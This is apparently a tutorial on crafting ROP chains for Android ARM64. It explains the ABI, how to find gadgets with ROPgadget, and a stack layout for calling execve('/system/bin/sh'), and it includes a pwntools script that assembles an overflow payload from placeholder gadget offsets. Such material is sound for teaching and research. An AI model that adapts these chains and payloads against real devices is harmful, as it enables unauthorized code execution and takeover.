ROP Chain Crafting on Android ARM64: Bypassing NX and ASLR in Real-World Scenarios

Introduction to ROP on Android ARM64

Return-Oriented Programming (ROP) is an exploit technique for defeating No-Execute (NX) protection and, when paired with an information leak, working around Address Space Layout Randomization (ASLR). On Android ARM64 devices these defenses are standard, which usually rules out direct shellcode injection. ROP lets an attacker chain together small fragments of existing code (gadgets) from the process's executable memory to run arbitrary logic, often leading to a full compromise.

This article delves into the intricacies of crafting ROP chains specifically for the ARM64 architecture, focusing on the unique challenges and opportunities presented in the Android ecosystem. We’ll explore ARM64 calling conventions, gadget discovery, and construct a practical ROP chain to achieve code execution.

ARM64 Architecture and Calling Conventions

Understanding the ARM64 Application Binary Interface (ABI) is paramount for successful ROP chain development. Unlike 32-bit ARM, which passes the first four arguments in R0-R3, ARM64 passes the first eight arguments in X0-X7 and returns values in X0.

General-Purpose Registers (X0-X30): 64-bit registers. X0-X7 carry the first eight function arguments, and X0 holds the return value. Subsequent arguments are passed on the stack.
Link Register (LR/X30): Stores the return address for function calls. Non-leaf functions save it on the stack, and a ROP chain typically overwrites that saved copy.
Stack Pointer (SP): Points to the current top of the stack.
Frame Pointer (FP/X29): Used for stack frame management.
System Call Register (X8): When making system calls via the svc #0 instruction, the system call number is placed in X8. Linux system calls take at most six arguments, passed in X0-X5.

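On ARM64, ret does not pop an address from the stack: it branches to the address held in X30. Useful gadgets therefore usually end with an epilogue that first reloads X30 from the stack, such as ldp x29, x30, [sp], #0x10 ; ret, or with an indirect branch through another register (br xN or blr xN). The crucial aspect is that control flow is transferred to a register that we can control, typically X30 (LR).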
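To make the role of X30 concrete, here is a small Python model of a typical ARM64 function epilogue, ldp x29, x30, [sp], #0x10 ; ret. It is only a sketch: the run_epilogue helper and the fake_stack contents are hypothetical, and real epilogues use varying frame sizes and offsets.

```python
import struct

def run_epilogue(stack: bytes, sp: int):
    """Model `ldp x29, x30, [sp], #0x10 ; ret` on a byte-string stack.

    Returns (x29, x30, new_sp). The `ret` that follows branches to x30.
    """
    x29, x30 = struct.unpack_from("<QQ", stack, sp)  # load the register pair
    return x29, x30, sp + 0x10                       # post-index: sp += 0x10

# Hypothetical attacker-controlled stack: saved x29 first, then saved x30.
fake_stack = struct.pack("<QQ", 0x4141414141414141, 0x7000123456)

x29, x30, sp = run_epilogue(fake_stack, 0)
print(f"ret would branch to {x30:#x}, sp advanced to {sp:#x}")
```

The point of the model is that the branch target comes from the stack only because the ldp reloaded X30 first. A gadget that ends in a bare ret without such a load simply returns to whatever X30 already holds.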

Bypassing ASLR and NX with ROP

NX (No-Execute) prevents code execution from data segments, blocking direct shellcode injection into the stack or heap. ROP circumvents this by executing existing code in executable memory regions.

ASLR (Address Space Layout Randomization) randomizes the base addresses of libraries and the stack/heap, making it difficult to predict gadget addresses. To bypass ASLR, an information leak is typically required to reveal the base address of a loaded library (e.g., libc.so). Once a single address within an ASLR-protected module is known, all other addresses within that module can be calculated due to fixed offsets.

For the purpose of this tutorial, we will assume a base address for a relevant module (e.g., libc) has been successfully leaked, allowing us to accurately locate gadgets.
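The fixed-offset arithmetic can be sketched in a few lines of Python. All numeric values here (the leaked address, PUTS_OFFSET, and GADGET_OFFSET) are made-up placeholders, and module_base is a hypothetical helper, not part of any library.

```python
PAGE_SIZE = 0x1000  # module bases are page-aligned; 4 KiB is the minimum page size

def module_base(leaked_addr: int, symbol_offset: int) -> int:
    """Recover a module's load address from one leaked pointer into it."""
    base = leaked_addr - symbol_offset
    if base % PAGE_SIZE != 0:
        # A misaligned result usually means the wrong offset or library version.
        raise ValueError("computed base is not page-aligned")
    return base

# Hypothetical values: a leaked pointer to a libc symbol and its file offset.
leaked_puts = 0x7000065AB0
PUTS_OFFSET = 0x65AB0
GADGET_OFFSET = 0x123456

libc_base = module_base(leaked_puts, PUTS_OFFSET)
gadget_addr = libc_base + GADGET_OFFSET
print(f"libc base: {libc_base:#x}, gadget: {gadget_addr:#x}")
```

The alignment check is a cheap sanity test: if the offsets were taken from a different build of the library than the one on the device, the subtraction rarely lands on a page boundary.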

Gadget Discovery on ARM64

Gadgets are short sequences of instructions ending with a control flow transfer instruction (e.g., ret, br xN, blr xN). Tools like ROPgadget are invaluable for finding these.

First, obtain the target binary or library (e.g., libc.so from an Android device). Then, run ROPgadget on it. The architecture is detected from the ELF header, so no architecture flag is needed:

ROPgadget --binary /path/to/libc.so

This command will list all identified gadgets. We’ll be looking for gadgets that allow us to:

Load arbitrary values into registers (e.g., ldr x0, [sp, #N] ; ... ; blr xM, or ldp x0, x1, [sp], #0x10 ; ... ; ret. ARM64 has no pop instruction, so stack loads use ldr and ldp).
Perform arithmetic or logical operations (less common for basic ROP, but useful for more complex chains).
Call system calls (e.g., svc #0).
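Sifting through the gadget listing by hand gets tedious, so a short filter script helps. The sketch below parses text in ROPgadget's "address : instruction ; instruction" listing format and picks out gadgets that load a given register from the stack or start with svc #0. The SAMPLE text is invented for illustration, and parse_gadgets and loads_register are hypothetical helpers.

```python
import re

GADGET_LINE = re.compile(r"^(0x[0-9a-fA-F]+) : (.+)$")

def parse_gadgets(text: str):
    """Return a list of (offset, [instructions]) from gadget listing lines."""
    gadgets = []
    for line in text.splitlines():
        match = GADGET_LINE.match(line.strip())
        if match:  # header and separator lines do not match and are skipped
            insns = [i.strip() for i in match.group(2).split(";")]
            gadgets.append((int(match.group(1), 16), insns))
    return gadgets

def loads_register(insns, reg: str) -> bool:
    """True if an ldr/ldp in the gadget writes `reg` from an sp-relative address."""
    for insn in insns:
        mnemonic, _, operands = insn.partition(" ")
        if mnemonic in ("ldr", "ldp") and "[sp" in operands:
            dests = [d.strip() for d in operands.split("[")[0].split(",")]
            if reg in dests:
                return True
    return False

# Invented sample listing, not taken from a real library.
SAMPLE = """\
Gadgets information
============================================================
0x0000000000012340 : ldp x29, x30, [sp], #0x10 ; ret
0x0000000000045678 : ldr x0, [sp, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret
0x00000000000abcd0 : svc #0 ; ret
"""

gadgets = parse_gadgets(SAMPLE)
x0_loaders = [off for off, insns in gadgets if loads_register(insns, "x0")]
svc_gadgets = [off for off, insns in gadgets if insns[0] == "svc #0"]
print([hex(o) for o in x0_loaders], [hex(o) for o in svc_gadgets])
```

Comparing destination registers as whole tokens, rather than searching for a substring, avoids false matches between similarly named registers.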

Constructing an `execve` ROP Chain

Our goal is to execute execve("/system/bin/sh", NULL, NULL). On ARM64 Linux (Android’s underlying kernel), the execve system call number is 221 (0xDD).

The parameters for execve are:

x0: Pointer to the path string (e.g., "/system/bin/sh").
x1: Pointer to an array of argument strings (NULL for our simple case).
x2: Pointer to an array of environment strings (NULL for our simple case).
x8: System call number (221 for execve).
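The register assignment above can be written down as data before any gadgets are chosen, which makes it easy to check a finished chain against the intended state. This is a minimal sketch: syscall_registers is a hypothetical helper and ADDR_SH_PATH is a placeholder address.

```python
SYS_EXECVE = 221  # execve on ARM64 Linux

def syscall_registers(number: int, *args: int) -> dict:
    """Map a syscall number and its arguments to ARM64 register names."""
    if len(args) > 6:
        raise ValueError("Linux syscalls take at most six arguments")
    regs = {f"x{i}": value for i, value in enumerate(args)}  # x0, x1, ...
    regs["x8"] = number                                      # syscall number
    return regs

# Placeholder for wherever the path string ends up in memory.
ADDR_SH_PATH = 0x7FFFFFF040

target = syscall_registers(SYS_EXECVE, ADDR_SH_PATH, 0, 0)
for reg, value in target.items():
    print(f"{reg} = {value:#x}")
```

Each entry in the resulting dictionary is one requirement the gadget chain has to satisfy before svc #0 runs.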

Step-by-Step ROP Chain Construction:

We need to find gadgets that help us populate these registers.

1. Prepare String Data: The NUL-terminated string "/system/bin/sh\x00" must exist in memory, typically placed on the stack after the ROP chain itself, or in a known data segment.

2. Load the address of "/system/bin/sh" into x0: We need a gadget that loads a value from the stack into x0. A common pattern is:

0xDEADBEEF:   ldr x0, [sp, #0x10] ; ... ; blr xY

Or a pop-like load pair such as ldp x0, x1, [sp], #0x10 ; ... ; ret. ARM64 has no pop instruction, so the gadget names used below (for example, a gadget that "pops" x0, x1, and x2) are shorthand for a sequence of ldr/ldp loads from the stack followed by a return. The ROP chain places the address of "/system/bin/sh" in the stack slot from which x0 is loaded.

3. Load NULL into x1 and x2: Following the same logic, we load 0x0 into x1 and x2, either with the same type of gadget or with separate ones. Many useful gadgets end with br xN or blr xN, which takes the next gadget address from a register we must already control.

4. Load System Call Number into x8: This is crucial. We need a gadget that moves a value from the stack into x8. A common gadget might look like:

0xCAFEFEED:   ldr x8, [sp, #0xX0] ; add sp, sp, #0xY0 ; blr xZ

Alternatively, a sequence like mov x8, xN ; blr xY where xN was previously loaded from the stack. The value 221 (or 0xDD) would be placed on the stack at the appropriate offset for this gadget.

5. Execute System Call: Finally, we need a gadget that performs the system call:

0xBADC0DE0:   svc #0 ; ret

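The svc #0 instruction traps into the kernel. If execve succeeds, the process image is replaced and execution never returns to the chain. If it fails and a `ret` follows, execution continues at whatever address X30 holds at that point, so it is worth arranging a follow-on gadget there to exit cleanly or pivot to another stage.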

Example ROP Chain Layout (Conceptual Stack)

Assuming a buffer overflow allows us to overwrite the saved Link Register (LR) value on the stack and control the stack contents that follow it:

[Stack Address]   [Content]                      [Purpose]
SP + 0x00         Gadget_Pop_X0_X1_X2_ret_addr   (Address of the gadget to load x0, x1, x2)
SP + 0x08         Addr_of_String_sh              (Value for x0)
SP + 0x10         0x0                            (Value for x1)
SP + 0x18         0x0                            (Value for x2)
SP + 0x20         Gadget_Pop_X8_ret_addr         (Address of the gadget to load x8)
SP + 0x28         0xDD                           (Value for x8, SYS_execve)
SP + 0x30         Gadget_SVC_0_ret_addr          (Address of the svc #0 instruction)
SP + 0x38         Addr_of_String_sh              (Spare slot: repeated for convenience, or the start of any subsequent payload)
...
[Some higher address]   String_sh: "/system/bin/sh\x00"

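This is a simplified representation. In a real scenario, stack alignment (16-byte for ARM64) must be maintained, and gadgets are rarely so perfectly aligned for `pop` operations. Because `ret` branches to X30 rather than popping the stack, each gadget must also reload X30 from the stack (or branch through another controlled register) for the chain to continue. You might need to chain multiple smaller `ldr` or `add` gadgets, or find specific `ldp` (load pair) instructions to load multiple registers.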
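A more realistic way to think about an ARM64 chain is as a sequence of frames, one per gadget, each a multiple of 16 bytes with values placed at the offsets that gadget reads. The sketch below builds one such frame for a hypothetical gadget, ldr x0, [sp, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret. The build_frame helper, the gadget, and every address are assumptions made for illustration.

```python
import struct

def build_frame(size: int, slots: dict, fill: int = 0x4141414141414141) -> bytes:
    """Build the stack bytes one gadget consumes.

    size  -- bytes the gadget adds to sp (must keep sp 16-byte aligned)
    slots -- {offset_from_sp: 64-bit value} for each slot the gadget reads
    """
    if size % 16 != 0:
        raise ValueError("frame size must be a multiple of 16")
    frame = bytearray(struct.pack("<Q", fill) * (size // 8))
    for offset, value in slots.items():
        if offset % 8 != 0 or not 0 <= offset <= size - 8:
            raise ValueError(f"bad slot offset {offset:#x}")
        struct.pack_into("<Q", frame, offset, value)
    return bytes(frame)

# Placeholder values for the hypothetical gadget described above.
NEXT_GADGET = 0x7000ABCDE0   # loaded into x30 from [sp, #0x08]
ADDR_SH_PATH = 0x7FFFFFF040  # loaded into x0 from [sp, #0x18]

frame = build_frame(0x20, {0x08: NEXT_GADGET, 0x18: ADDR_SH_PATH})
print(frame.hex())
```

Slots the gadget never reads keep the filler value, which makes a hex dump of the finished chain easier to check against the gadget's disassembly.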

Practical Payload Construction (Python with Pwntools)

If you were exploiting this remotely, a Python script using pwntools would be ideal:

from pwn import log, p64

# Placeholder values. In a real exploit both come from information leaks.
libc_base = 0x7000000000        # example leaked base address of libc.so
rop_start_sp = 0x7FFFFFF000     # example stack address where the chain begins

# Gadget offsets from libc_base (found via ROPgadget).
# These are illustrative; actual gadgets and offsets vary per build.
pop_x0_x1_x2_ret = libc_base + 0x123456  # loads x0, x1, x2 from the stack
pop_x8_ret       = libc_base + 0x789ABC  # loads x8 from the stack
svc_0            = libc_base + 0xDEF012  # svc #0 ; ret

SYS_EXECVE = 221                 # execve on ARM64 Linux
sh_path = b"/system/bin/sh\x00"  # NUL-terminated path, placed after the chain

# Fill the buffer up to the point where the saved return address is overwritten
filler = b"A" * 56


def build_chain(addr_sh_path):
    """Pack the conceptual chain from the stack layout above."""
    chain  = p64(pop_x0_x1_x2_ret)
    chain += p64(addr_sh_path)   # x0 = "/system/bin/sh"
    chain += p64(0)              # x1 = NULL
    chain += p64(0)              # x2 = NULL
    chain += p64(pop_x8_ret)
    chain += p64(SYS_EXECVE)     # x8 = 221
    chain += p64(svc_0)          # execve does not return on success
    chain += p64(0)              # spare slot for a fallback or exit gadget
    return chain


# The chain length does not depend on the address it contains, so measure it
# with a dummy value first, then rebuild with the real string address.
chain_len = len(build_chain(0))
addr_sh_path = rop_start_sp + chain_len  # string sits directly after the chain
rop_chain_bytes = build_chain(addr_sh_path)

final_payload = filler + rop_chain_bytes + sh_path

log.info(f"ROP chain length: {len(rop_chain_bytes)} bytes")
log.info(f"Full payload length: {len(final_payload)} bytes")
log.info(f"Shell path string will be at payload offset: {len(filler) + len(rop_chain_bytes)}")
log.info(f"Shell path string address: {addr_sh_path:#x}")
log.info(f"Generated ROP chain: {rop_chain_bytes.hex()}")

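Note: addr_sh_path must point to the actual location of "/system/bin/sh" in memory. If the string is placed directly after the ROP chain on the stack, its address is (initial_SP_of_ROP_chain + length_of_ROP_chain). Because the stack is also randomized under ASLR, computing this requires a leaked stack address in addition to the library base.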

Conclusion

ROP chain crafting on Android ARM64 is a sophisticated technique essential for bypassing NX and ASLR. It requires a deep understanding of the ARM64 ABI, meticulous gadget discovery, and careful stack layout management. While the initial setup can be complex, mastering ROP unlocks the ability to achieve arbitrary code execution in scenarios where direct shellcode is blocked, paving the way for further exploitation or privilege escalation on modern Android devices.

Always remember that gadget addresses and offsets vary between Android versions, device builds, and custom ROMs, necessitating a targeted approach for each exploit. System call numbers, by contrast, are fixed for a given architecture, although they differ between 32-bit ARM and ARM64.
